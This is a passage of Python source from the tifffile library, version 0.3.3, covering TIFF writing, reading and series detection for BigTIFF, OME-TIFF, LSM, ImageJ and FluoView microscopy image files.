http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf
(8) Micro-Manager File Formats.
http://www.micro-manager.org/wiki/Micro-Manager_File_Formats
(9) Tags for TIFF and Related Specifications. Digital Preservation.
http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml
Examples
--------
>>> data = numpy.random.rand(5, 301, 219)
>>> imsave('temp.tif', data)
>>> image = imread('temp.tif')
>>> numpy.testing.assert_array_equal(image, data)
>>> with TiffFile('temp.tif') as tif:
... images = tif.asarray()
... for page in tif:
... for tag in page.tags.values():
... t = tag.name, tag.value
... image = page.asarray()
"""
from __future__ import division, print_function
import sys
import os
import re
import glob
import math
import zlib
import time
import json
import struct
import warnings
import tempfile
import datetime
import collections
from fractions import Fraction
from xml.etree import cElementTree as etree
import numpy
try:
from . import _tifffile
except ImportError:
pass
__version__ = '0.3.3'
__docformat__ = 'restructuredtext en'
__all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter',
'TiffSequence')
def imsave(filename, data, **kwargs):
"""Write image data to TIFF file.
Refer to the TiffWriter class and member functions for documentation.
Parameters
----------
filename : str
Name of file to write.
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
kwargs : dict
Parameters 'byteorder', 'bigtiff', and 'software' are passed to
the TiffWriter class.
Parameters 'photometric', 'planarconfig', 'resolution',
'description', 'compress', 'volume', and 'extratags' are passed to
the TiffWriter.save function.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> description = '{"shape": %s}' % str(list(data.shape))
>>> imsave('temp.tif', data, compress=6,
... extratags=[(270, 's', 0, description, True)])
"""
tifargs = {}
for key in ('byteorder', 'bigtiff', 'software', 'writeshape'):
if key in kwargs:
tifargs[key] = kwargs[key]
del kwargs[key]
if 'writeshape' not in kwargs:
kwargs['writeshape'] = True
if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20:
tifargs['bigtiff'] = True
with TiffWriter(filename, **tifargs) as tif:
tif.save(data, **kwargs)
class TiffWriter(object):
"""Write image data to TIFF file.
TiffWriter instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> with TiffWriter('temp.tif', bigtiff=True) as tif:
... for i in range(data.shape[0]):
... tif.save(data[i], compress=6)
"""
TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6,
'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17}
TAGS = {
'new_subfile_type': 254, 'subfile_type': 255,
'image_width': 256, 'image_length': 257, 'bits_per_sample': 258,
'compression': 259, 'photometric': 262, 'fill_order': 266,
'document_name': 269, 'image_description': 270, 'strip_offsets': 273,
'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278,
'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283,
'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296,
'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320,
'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324,
'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339,
'image_depth': 32997, 'tile_depth': 32998}
def __init__(self, filename, bigtiff=False, byteorder=None,
software='tifffile.py'):
"""Create a new TIFF file for writing.
Use bigtiff=True when creating files greater than 2 GB.
Parameters
----------
filename : str
Name of file to write.
bigtiff : bool
If True, the BigTIFF format is used.
byteorder : {'<', '>'}
The endianness of the data in the file.
By default this is the system's native byte order.
software : str
Name of the software used to create the image.
Saved with the first page only.
"""
if byteorder not in (None, '<', '>'):
raise ValueError("invalid byteorder %s" % byteorder)
if byteorder is None:
byteorder = '<' if sys.byteorder == 'little' else '>'
self._byteorder = byteorder
self._software = software
self._fh = open(filename, 'wb')
self._fh.write({'<': b'II', '>': b'MM'}[byteorder])
if bigtiff:
self._bigtiff = True
self._offset_size = 8
self._tag_size = 20
self._numtag_format = 'Q'
self._offset_format = 'Q'
self._val_format = '8s'
self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0))
else:
self._bigtiff = False
self._offset_size = 4
self._tag_size = 12
self._numtag_format = 'H'
self._offset_format = 'I'
self._val_format = '4s'
self._fh.write(struct.pack(byteorder+'H', 42))
# first IFD
self._ifd_offset = self._fh.tell()
self._fh.write(struct.pack(byteorder+self._offset_format, 0))
def save(self, data, photometric=None, planarconfig=None, resolution=None,
description=None, volume=False, writeshape=False, compress=0,
extratags=()):
"""Write image data to TIFF file.
Image data are written in one stripe per plane.
Dimensions larger than 2 to 4 (depending on photometric mode, planar
configuration, and SGI mode) are flattened and saved as separate pages.
The 'sample_format' and 'bits_per_sample' TIFF tags are derived from
the data type.
Parameters
----------
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
photometric : {'minisblack', 'miniswhite', 'rgb'}
The color space of the image data.
By default this setting is inferred from the data shape.
planarconfig : {'contig', 'planar'}
Specifies if samples are stored contiguous or in separate planes.
By default this setting is inferred from the data shape.
'contig': last dimension contains samples.
'planar': third last dimension contains samples.
resolution : (float, float) or ((int, int), (int, int))
X and Y resolution in dots per inch as float or rational numbers.
description : str
The subject of the image. Saved with the first page only.
compress : int
Values from 0 to 9 controlling the level of zlib compression.
If 0, data are written uncompressed (default).
volume : bool
If True, volume data are stored in one tile (if applicable) using
the SGI image_depth and tile_depth tags.
Image width and depth must be multiple of 16.
Few software can read this format, e.g. MeVisLab.
writeshape : bool
If True, write the data shape to the image_description tag
if necessary and no other description is given.
extratags: sequence of tuples
Additional tags as [(code, dtype, count, value, writeonce)].
code : int
The TIFF tag Id.
dtype : str
Data type of items in 'value' in Python struct format.
One of B, s, H, I, 2I, b, h, i, f, d, Q, or q.
count : int
Number of data values. Not used for string values.
value : sequence
'Count' values compatible with 'dtype'.
writeonce : bool
If True, the tag is written to the first page only.
"""
if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'):
raise ValueError("invalid photometric %s" % photometric)
if planarconfig not in (None, 'contig', 'planar'):
raise ValueError("invalid planarconfig %s" % planarconfig)
if not 0 <= compress <= 9:
raise ValueError("invalid compression level %s" % compress)
fh = self._fh
byteorder = self._byteorder
numtag_format = self._numtag_format
val_format = self._val_format
offset_format = self._offset_format
offset_size = self._offset_size
tag_size = self._tag_size
data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C')
data_shape = shape = data.shape
data = numpy.atleast_2d(data)
# normalize shape of data
samplesperpixel = 1
extrasamples = 0
if volume and data.ndim < 3:
volume = False
if photometric is None:
if planarconfig:
photometric = 'rgb'
elif data.ndim > 2 and shape[-1] in (3, 4):
photometric = 'rgb'
elif volume and data.ndim > 3 and shape[-4] in (3, 4):
photometric = 'rgb'
elif data.ndim > 2 and shape[-3] in (3, 4):
photometric = 'rgb'
else:
photometric = 'minisblack'
if planarconfig and len(shape) <= (3 if volume else 2):
planarconfig = None
photometric = 'minisblack'
if photometric == 'rgb':
if len(shape) < 3:
raise ValueError("not a RGB(A) image")
if len(shape) < 4:
volume = False
if planarconfig is None:
if shape[-1] in (3, 4):
planarconfig = 'contig'
elif shape[-4 if volume else -3] in (3, 4):
planarconfig = 'planar'
elif shape[-1] > shape[-4 if volume else -3]:
planarconfig = 'planar'
else:
planarconfig = 'contig'
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
if samplesperpixel > 3:
extrasamples = samplesperpixel - 3
elif planarconfig and len(shape) > (3 if volume else 2):
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
extrasamples = samplesperpixel - 1
else:
planarconfig = None
# remove trailing 1s
while len(shape) > 2 and shape[-1] == 1:
shape = shape[:-1]
if len(shape) < 3:
volume = False
if False and (
len(shape) > (3 if volume else 2) and shape[-1] < 5 and
all(shape[-1] < i
for i in shape[(-4 if volume else -3):-1])):
# DISABLED: non-standard TIFF, e.g. (220, 320, 2)
planarconfig = 'contig'
samplesperpixel = shape[-1]
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
else:
data = data.reshape(
(-1, 1) + shape[(-3 if volume else -2):] + (1,))
if samplesperpixel == 2:
warnings.warn("writing non-standard TIFF (samplesperpixel 2)")
if volume and (data.shape[-2] % 16 or data.shape[-3] % 16):
warnings.warn("volume width or length are not multiple of 16")
volume = False
data = numpy.swapaxes(data, 1, 2)
data = data.reshape(
(data.shape[0] * data.shape[1],) + data.shape[2:])
# data.shape is now normalized 5D or 6D, depending on volume
# (pages, planar_samples, (depth,) height, width, contig_samples)
assert len(data.shape) in (5, 6)
shape = data.shape
bytestr = bytes if sys.version[0] == '2' else (
lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x)
tags = [] # list of (code, ifdentry, ifdvalue, writeonce)
if volume:
# use tiles to save volume data
tag_byte_counts = TiffWriter.TAGS['tile_byte_counts']
tag_offsets = TiffWriter.TAGS['tile_offsets']
else:
# else use strips
tag_byte_counts = TiffWriter.TAGS['strip_byte_counts']
tag_offsets = TiffWriter.TAGS['strip_offsets']
def pack(fmt, *val):
return struct.pack(byteorder+fmt, *val)
def addtag(code, dtype, count, value, writeonce=False):
# Compute ifdentry & ifdvalue bytes from code, dtype, count, value.
# Append (code, ifdentry, ifdvalue, writeonce) to tags list.
code = int(TiffWriter.TAGS.get(code, code))
try:
tifftype = TiffWriter.TYPES[dtype]
except KeyError:
raise ValueError("unknown dtype %s" % dtype)
rawcount = count
if dtype == 's':
value = bytestr(value) + b'\0'
count = rawcount = len(value)
value = (value, )
if len(dtype) > 1:
count *= int(dtype[:-1])
dtype = dtype[-1]
ifdentry = [pack('HH', code, tifftype),
pack(offset_format, rawcount)]
ifdvalue = None
if count == 1:
if isinstance(value, (tuple, list)):
value = value[0]
ifdentry.append(pack(val_format, pack(dtype, value)))
elif struct.calcsize(dtype) * count <= offset_size:
ifdentry.append(pack(val_format,
pack(str(count)+dtype, *value)))
else:
ifdentry.append(pack(offset_format, 0))
ifdvalue = pack(str(count)+dtype, *value)
tags.append((code, b''.join(ifdentry), ifdvalue, writeonce))
def rational(arg, max_denominator=1000000):
# return nominator and denominator from float or two integers
try:
f = Fraction.from_float(arg)
except TypeError:
f = Fraction(arg[0], arg[1])
f = f.limit_denominator(max_denominator)
return f.numerator, f.denominator
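# Worked examples (illustrative):
#   rational(72.0)      -> (72, 1)
#   rational(2.25)      -> (9, 4)
#   rational((300, 1))  -> (300, 1)
# Fraction.from_float raises TypeError for a (num, den) tuple, so integer
# pairs fall through to the Fraction(arg[0], arg[1]) branch.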
if self._software:
addtag('software', 's', 0, self._software, writeonce=True)
self._software = None # only save to first page
if description:
addtag('image_description', 's', 0, description, writeonce=True)
elif writeshape and shape[0] > 1 and shape != data_shape:
addtag('image_description', 's', 0,
"shape=(%s)" % (",".join('%i' % i for i in data_shape)),
writeonce=True)
addtag('datetime', 's', 0,
datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"),
writeonce=True)
addtag('compression', 'H', 1, 32946 if compress else 1)
addtag('orientation', 'H', 1, 1)
addtag('image_width', 'I', 1, shape[-2])
addtag('image_length', 'I', 1, shape[-3])
if volume:
addtag('image_depth', 'I', 1, shape[-4])
addtag('tile_depth', 'I', 1, shape[-4])
addtag('tile_width', 'I', 1, shape[-2])
addtag('tile_length', 'I', 1, shape[-3])
addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2)
addtag('sample_format', 'H', 1,
{'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind])
addtag('photometric', 'H', 1,
{'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric])
addtag('samples_per_pixel', 'H', 1, samplesperpixel)
if planarconfig and samplesperpixel > 1:
addtag('planar_configuration', 'H', 1, 1
if planarconfig == 'contig' else 2)
addtag('bits_per_sample', 'H', samplesperpixel,
(data.dtype.itemsize * 8, ) * samplesperpixel)
else:
addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8)
if extrasamples:
if photometric == 'rgb' and extrasamples == 1:
addtag('extra_samples', 'H', 1, 1) # associated alpha channel
else:
addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples)
if resolution:
addtag('x_resolution', '2I', 1, rational(resolution[0]))
addtag('y_resolution', '2I', 1, rational(resolution[1]))
addtag('resolution_unit', 'H', 1, 2)
addtag('rows_per_strip', 'I', 1,
shape[-3] * (shape[-4] if volume else 1))
# use one strip or tile per plane
strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1]
addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts)
addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1])
# add extra tags from users
for t in extratags:
addtag(*t)
# the entries in an IFD must be sorted in ascending order by tag code
tags = sorted(tags, key=lambda x: x[0])
if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize
> 2**31-1):
raise ValueError("data too large for non-bigtiff file")
for pageindex in range(shape[0]):
# update pointer at ifd_offset
pos = fh.tell()
fh.seek(self._ifd_offset)
fh.write(pack(offset_format, pos))
fh.seek(pos)
# write ifdentries
fh.write(pack(numtag_format, len(tags)))
tag_offset = fh.tell()
fh.write(b''.join(t[1] for t in tags))
self._ifd_offset = fh.tell()
fh.write(pack(offset_format, 0)) # offset to next IFD
# write tag values and patch offsets in ifdentries, if necessary
for tagindex, tag in enumerate(tags):
if tag[2]:
pos = fh.tell()
fh.seek(tag_offset + tagindex*tag_size + offset_size + 4)
fh.write(pack(offset_format, pos))
fh.seek(pos)
if tag[0] == tag_offsets:
strip_offsets_offset = pos
elif tag[0] == tag_byte_counts:
strip_byte_counts_offset = pos
fh.write(tag[2])
# write image data
data_offset = fh.tell()
if compress:
strip_byte_counts = []
for plane in data[pageindex]:
plane = zlib.compress(plane, compress)
strip_byte_counts.append(len(plane))
fh.write(plane)
else:
# if this fails, try updating Python/numpy
data[pageindex].tofile(fh)
fh.flush()
# update strip and tile offsets and byte_counts if necessary
pos = fh.tell()
for tagindex, tag in enumerate(tags):
if tag[0] == tag_offsets: # strip or tile offsets
if tag[2]:
fh.seek(strip_offsets_offset)
strip_offset = data_offset
for size in strip_byte_counts:
fh.write(pack(offset_format, strip_offset))
strip_offset += size
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, data_offset))
elif tag[0] == tag_byte_counts: # strip or tile byte_counts
if compress:
if tag[2]:
fh.seek(strip_byte_counts_offset)
for size in strip_byte_counts:
fh.write(pack(offset_format, size))
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, strip_byte_counts[0]))
break
fh.seek(pos)
fh.flush()
# remove tags that should be written only once
if pageindex == 0:
tags = [t for t in tags if not t[-1]]
def close(self):
self._fh.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def imread(files, **kwargs):
"""Return image data from TIFF file(s) as numpy array.
The first image series is returned if no arguments are provided.
Parameters
----------
files : str or list
File name, glob pattern, or list of file names.
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages in file to return as array.
multifile : bool
If True (default), OME-TIFF data may include pages from multiple files.
pattern : str
Regular expression pattern that matches axes names and indices in
file names.
kwargs : dict
Additional parameters passed to the TiffFile or TiffSequence asarray
function.
Examples
--------
>>> im = imread('temp.tif', key=0)
>>> im.shape
(3, 301, 219)
>>> ims = imread(['temp.tif', 'temp.tif'])
>>> ims.shape
(2, 10, 3, 301, 219)
"""
kwargs_file = {}
if 'multifile' in kwargs:
kwargs_file['multifile'] = kwargs['multifile']
del kwargs['multifile']
else:
kwargs_file['multifile'] = True
kwargs_seq = {}
if 'pattern' in kwargs:
kwargs_seq['pattern'] = kwargs['pattern']
del kwargs['pattern']
if isinstance(files, basestring) and any(i in files for i in '?*'):
files = glob.glob(files)
if not files:
raise ValueError('no files found')
if len(files) == 1:
files = files[0]
if isinstance(files, basestring):
with TiffFile(files, **kwargs_file) as tif:
return tif.asarray(**kwargs)
else:
with TiffSequence(files, **kwargs_seq) as imseq:
return imseq.asarray(**kwargs)
class lazyattr(object):
"""Lazy object attribute whose value is computed on first access."""
__slots__ = ('func', )
def __init__(self, func):
self.func = func
def __get__(self, instance, owner):
if instance is None:
return self
value = self.func(instance)
if value is NotImplemented:
return getattr(super(owner, instance), self.func.__name__)
setattr(instance, self.func.__name__, value)
return value
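# Usage sketch for lazyattr (illustrative; `compute_once` is a stand-in):
#
#   class Demo(object):
#       @lazyattr
#       def expensive(self):
#           return compute_once()  # evaluated on first access only
#
# The setattr() in __get__ replaces the descriptor with the computed value
# on the instance, so subsequent lookups bypass __get__ entirely.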
class TiffFile(object):
"""Read image and metadata from TIFF, STK, LSM, and FluoView files.
TiffFile instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Attributes
----------
pages : list
All TIFF pages in file.
series : list of Records(shape, dtype, axes, TiffPages)
TIFF pages with compatible shapes and types.
micromanager_metadata: dict
Extra MicroManager non-TIFF metadata in the file, if exists.
All attributes are read-only.
Examples
--------
>>> with TiffFile('temp.tif') as tif:
... data = tif.asarray()
... data.shape
(5, 301, 219)
"""
def __init__(self, arg, name=None, offset=None, size=None,
multifile=True, multifile_close=True):
"""Initialize instance from file.
Parameters
----------
arg : str or open file
Name of file or open file object.
The file objects are closed in TiffFile.close().
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
multifile : bool
If True (default), series may include pages from multiple files.
Currently applies to OME-TIFF only.
multifile_close : bool
If True (default), keep the handles of other files in multifile
series closed. This is inefficient when few files refer to
many pages. If False, the C runtime may run out of resources.
"""
self._fh = FileHandle(arg, name=name, offset=offset, size=size)
self.offset_size = None
self.pages = []
self._multifile = bool(multifile)
self._multifile_close = bool(multifile_close)
self._files = {self._fh.name: self} # cache of TiffFiles
try:
self._fromfile()
except Exception:
self._fh.close()
raise
@property
def filehandle(self):
"""Return file handle."""
return self._fh
@property
def filename(self):
"""Return name of file handle."""
return self._fh.name
def close(self):
"""Close open file handle(s)."""
for tif in self._files.values():
tif._fh.close()
self._files = {}
def _fromfile(self):
"""Read TIFF header and all page records from file."""
self._fh.seek(0)
try:
self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)]
except KeyError:
raise ValueError("not a valid TIFF file")
version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0]
if version == 43: # BigTiff
self.offset_size, zero = struct.unpack(self.byteorder+'HH',
self._fh.read(4))
if zero or self.offset_size != 8:
raise ValueError("not a valid BigTIFF file")
elif version == 42:
self.offset_size = 4
else:
raise ValueError("not a TIFF file")
self.pages = []
while True:
try:
page = TiffPage(self)
self.pages.append(page)
except StopIteration:
break
if not self.pages:
raise ValueError("empty TIFF file")
if self.is_micromanager:
# MicroManager files contain metadata not stored in TIFF tags.
self.micromanager_metadata = read_micromanager_metadata(self._fh)
if self.is_lsm:
self._fix_lsm_strip_offsets()
self._fix_lsm_strip_byte_counts()
def _fix_lsm_strip_offsets(self):
"""Unwrap strip offsets for LSM files greater than 4 GB."""
for series in self.series:
wrap = 0
previous_offset = 0
for page in series.pages:
strip_offsets = []
for current_offset in page.strip_offsets:
if current_offset < previous_offset:
wrap += 2**32
strip_offsets.append(current_offset + wrap)
previous_offset = current_offset
page.strip_offsets = tuple(strip_offsets)
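# Worked example of the unwrapping (illustrative offsets): if a page's raw
# strip offsets read (4100000000, 5000000), the second offset has wrapped
# past 2**32 and becomes 5000000 + 2**32 = 4299967296; the accumulated wrap
# then carries over to every later page in the series.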
def _fix_lsm_strip_byte_counts(self):
"""Set strip_byte_counts to size of compressed data.
The strip_byte_counts tag in LSM files contains the number of bytes
for the uncompressed data.
"""
if not self.pages:
return
strips = {}
for page in self.pages:
assert len(page.strip_offsets) == len(page.strip_byte_counts)
for offset, bytecount in zip(page.strip_offsets,
page.strip_byte_counts):
strips[offset] = bytecount
offsets = sorted(strips.keys())
offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size))
for i, offset in enumerate(offsets[:-1]):
strips[offset] = min(strips[offset], offsets[i+1] - offset)
for page in self.pages:
if page.compression:
page.strip_byte_counts = tuple(
strips[offset] for offset in page.strip_offsets)
@lazyattr
def series(self):
"""Return series of TiffPage with compatible shape and properties."""
if not self.pages:
return []
series = []
page0 = self.pages[0]
if self.is_ome:
series = self._omeseries()
elif self.is_fluoview:
dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T',
b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R',
b'EVENT': 'V', b'EXPOSURE': 'L'}
mmhd = list(reversed(page0.mm_header.dimensions))
series = [Record(
axes=''.join(dims.get(i[0].strip().upper(), 'Q')
for i in mmhd if i[1] > 1),
shape=tuple(int(i[1]) for i in mmhd if i[1] > 1),
pages=self.pages, dtype=numpy.dtype(page0.dtype))]
elif self.is_lsm:
lsmi = page0.cz_lsm_info
axes = CZ_SCAN_TYPES[lsmi.scan_type]
if page0.is_rgb:
axes = axes.replace('C', '').replace('XY', 'XYC')
axes = axes[::-1]
shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes)
pages = [p for p in self.pages if not p.is_reduced]
series = [Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype))]
if len(pages) != len(self.pages): # reduced RGB pages
pages = [p for p in self.pages if p.is_reduced]
cp = 1
i = 0
while cp < len(pages) and i < len(shape)-2:
cp *= shape[i]
i += 1
shape = shape[:i] + pages[0].shape
axes = axes[:i] + 'CYX'
series.append(Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype)))
elif self.is_imagej:
shape = []
axes = []
ij = page0.imagej_tags
if 'frames' in ij:
shape.append(ij['frames'])
axes.append('T')
if 'slices' in ij:
shape.append(ij['slices'])
axes.append('Z')
if 'channels' in ij and not self.is_rgb:
shape.append(ij['channels'])
axes.append('C')
remain = len(self.pages) // (product(shape) if shape else 1)
if remain > 1:
shape.append(remain)
axes.append('I')
shape.extend(page0.shape)
axes.extend(page0.axes)
axes = ''.join(axes)
series = [Record(pages=self.pages, shape=tuple(shape), axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif self.is_nih:
if len(self.pages) == 1:
shape = page0.shape
axes = page0.axes
else:
shape = (len(self.pages),) + page0.shape
axes = 'I' + page0.axes
series = [Record(pages=self.pages, shape=shape, axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif page0.is_shaped:
# TODO: shaped files can contain multiple series
shape = page0.tags['image_description'].value[7:-1]
shape = tuple(int(i) for i in shape.split(b','))
series = [Record(pages=self.pages, shape=shape,
axes='Q' * len(shape),
dtype=numpy.dtype(page0.dtype))]
# generic detection of series
if not series:
shapes = []
pages = {}
for page in self.pages:
if not page.shape:
continue
shape = page.shape + (page.axes,
page.compression in TIFF_DECOMPESSORS)
if shape not in pages:
shapes.append(shape)
pages[shape] = [page]
else:
pages[shape].append(page)
series = [Record(pages=pages[s],
axes=(('I' + s[-2])
if len(pages[s]) > 1 else s[-2]),
dtype=numpy.dtype(pages[s][0].dtype),
shape=((len(pages[s]), ) + s[:-2]
if len(pages[s]) > 1 else s[:-2]))
for s in shapes]
# remove empty series, e.g. in MD Gel files
series = [s for s in series if sum(s.shape) > 0]
return series
def asarray(self, key=None, series=None, memmap=False):
"""Return image data from multiple TIFF pages as numpy array.
By default the first image series is returned.
Parameters
----------
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages to return as array.
memmap : bool
If True, return an array stored in a binary file on disk
if possible.
"""
if key is None and series is None:
series = 0
if series is not None:
pages = self.series[series].pages
else:
pages = self.pages
if key is None:
pass
elif isinstance(key, int):
pages = [pages[key]]
elif isinstance(key, slice):
pages = pages[key]
elif isinstance(key, collections.Iterable):
pages = [pages[k] for k in key]
else:
raise TypeError("key must be an int, slice, or sequence")
if not len(pages):
raise ValueError("no pages selected")
if self.is_nih:
if pages[0].is_palette:
result = stack_pages(pages, colormapped=False, squeeze=False)
result = numpy.take(pages[0].color_map, result, axis=1)
result = numpy.swapaxes(result, 0, 1)
else:
result = stack_pages(pages, memmap=memmap,
colormapped=False, squeeze=False)
elif len(pages) == 1:
return pages[0].asarray(memmap=memmap)
elif self.is_ome:
assert not self.is_palette, "color mapping disabled for ome-tiff"
if any(p is None for p in pages):
# zero out missing pages
firstpage = next(p for p in pages if p)
nopage = numpy.zeros_like(
firstpage.asarray(memmap=False))
s = self.series[series]
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape)
result = result.reshape(-1)
else:
result = numpy.empty(s.shape, s.dtype).reshape(-1)
index = 0
class KeepOpen:
# keep Tiff files open between consecutive pages
def __init__(self, parent, close):
self.master = parent
self.parent = parent
self._close = close
def open(self, page):
if self._close and page and page.parent != self.parent:
if self.parent != self.master:
self.parent.filehandle.close()
self.parent = page.parent
self.parent.filehandle.open()
def close(self):
if self._close and self.parent != self.master:
self.parent.filehandle.close()
keep = KeepOpen(self, self._multifile_close)
for page in pages:
keep.open(page)
if page:
a = page.asarray(memmap=False, colormapped=False,
reopen=False)
else:
a = nopage
try:
result[index:index + a.size] = a.reshape(-1)
except ValueError as e:
warnings.warn("ome-tiff: %s" % e)
break
index += a.size
keep.close()
else:
result = stack_pages(pages, memmap=memmap)
if key is None:
try:
result.shape = self.series[series].shape
except ValueError:
try:
warnings.warn("failed to reshape %s to %s" % (
result.shape, self.series[series].shape))
# try series of expected shapes
result.shape = (-1,) + self.series[series].shape
except ValueError:
# revert to generic shape
result.shape = (-1,) + pages[0].shape
else:
result.shape = (-1,) + pages[0].shape
return result
def _omeseries(self):
"""Return image series in OME-TIFF file(s)."""
root = etree.fromstring(self.pages[0].tags['image_description'].value)
uuid = root.attrib.get('UUID', None)
self._files = {uuid: self}
dirname = self._fh.dirname
modulo = {}
result = []
for element in root:
if element.tag.endswith('BinaryOnly'):
warnings.warn("ome-xml: not an ome-tiff master file")
break
if element.tag.endswith('StructuredAnnotations'):
for annot in element:
if not annot.attrib.get('Namespace',
'').endswith('modulo'):
continue
for value in annot:
for modul in value:
for along in modul:
if not along.tag[:-1].endswith('Along'):
continue
axis = along.tag[-1]
newaxis = along.attrib.get('Type', 'other')
newaxis = AXES_LABELS[newaxis]
if 'Start' in along.attrib:
labels = range(
int(along.attrib['Start']),
int(along.attrib['End']) + 1,
int(along.attrib.get('Step', 1)))
else:
labels = [label.text for label in along
if label.tag.endswith('Label')]
modulo[axis] = (newaxis, labels)
if not element.tag.endswith('Image'):
continue
for pixels in element:
if not pixels.tag.endswith('Pixels'):
continue
atr = pixels.attrib
dtype = atr.get('Type', None)
axes = ''.join(reversed(atr['DimensionOrder']))
shape = list(int(atr['Size'+ax]) for ax in axes)
size = product(shape[:-2])
ifds = [None] * size
for data in pixels:
if not data.tag.endswith('TiffData'):
continue
atr = data.attrib
ifd = int(atr.get('IFD', 0))
num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0))
num = int(atr.get('PlaneCount', num))
idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]]
try:
idx = numpy.ravel_multi_index(idx, shape[:-2])
except ValueError:
# ImageJ produces invalid ome-xml when cropping
warnings.warn("ome-xml: invalid TiffData index")
continue
for uuid in data:
if not uuid.tag.endswith('UUID'):
continue
if uuid.text not in self._files:
if not self._multifile:
# abort reading multifile OME series
# and fall back to generic series
return []
fname = uuid.attrib['FileName']
try:
tif = TiffFile(os.path.join(dirname, fname))
except (IOError, ValueError):
# nothing to close here: TiffFile closes its own handle when __init__ fails
warnings.warn(
"ome-xml: failed to read '%s'" % fname)
break
self._files[uuid.text] = tif
if self._multifile_close:
tif.close()
pages = self._files[uuid.text].pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
# only process first uuid
break
else:
pages = self.pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
if all(i is None for i in ifds):
# skip images without data
continue
dtype = next(i for i in ifds if i).dtype
result.append(Record(axes=axes, shape=shape, pages=ifds,
dtype=numpy.dtype(dtype)))
for record in result:
for axis, (newaxis, labels) in modulo.items():
i = record.axes.index(axis)
size = len(labels)
if record.shape[i] == size:
record.axes = record.axes.replace(axis, newaxis, 1)
else:
record.shape[i] //= size
record.shape.insert(i+1, size)
record.axes = record.axes.replace(axis, axis+newaxis, 1)
record.shape = tuple(record.shape)
# squeeze dimensions
for record in result:
record.shape, record.axes = squeeze_axes(record.shape, record.axes)
return result
def __len__(self):
"""Return number of image pages in file."""
return len(self.pages)
def __getitem__(self, key):
"""Return specified page."""
return self.pages[key]
def __iter__(self):
"""Return iterator over pages."""
return iter(self.pages)
def __str__(self):
"""Return string containing information about file."""
result = [
self._fh.name.capitalize(),
format_size(self._fh.size),
{'<': 'little endian', '>': 'big endian'}[self.byteorder]]
if self.is_bigtiff:
result.append("bigtiff")
if len(self.pages) > 1:
result.append("%i pages" % len(self.pages))
if len(self.series) > 1:
result.append("%i series" % len(self.series))
if len(self._files) > 1:
result.append("%i files" % (len(self._files)))
return ", ".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
@lazyattr
def fstat(self):
try:
return os.fstat(self._fh.fileno())
